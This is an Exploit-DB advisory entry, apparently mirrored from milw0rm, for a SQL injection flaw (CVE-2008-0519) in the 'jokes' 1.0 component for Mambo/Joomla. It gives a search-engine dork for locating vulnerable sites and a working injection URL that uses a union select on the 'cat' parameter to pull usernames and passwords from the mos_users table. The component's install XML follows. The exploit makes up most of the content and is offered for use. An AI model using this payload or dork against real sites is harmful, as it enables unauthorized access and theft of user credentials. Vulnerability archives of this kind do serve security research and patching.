Mambo Component jokes 1.0 cat SQL Injection Vulnerability

2008-01-30T00:00:00
ID EDB-ID:5015
Type exploitdb
Reporter S@BUN
Modified 2008-01-30T00:00:00

Description

Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability. CVE-2008-0519. Webapps exploit for php platform

                                        
                                            #########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                        S@BUN
#########################################################################
# S@BUN                             GOOD LUCKY                        S@BUN
#########################################################################


  <mosinstall type="component">
    <name>jokes</name>
    <creationDate>29/12/2005</creationDate>
    <author>Atapin</author>
    <copyright>Released under the GNU/GPL License</copyright>
    <authorEmail>info@atapin.net</authorEmail>

    <authorUrl>www.atapin.net</authorUrl>
    <version>1.0</version>
    <description></description>

# milw0rm.com [2008-01-30]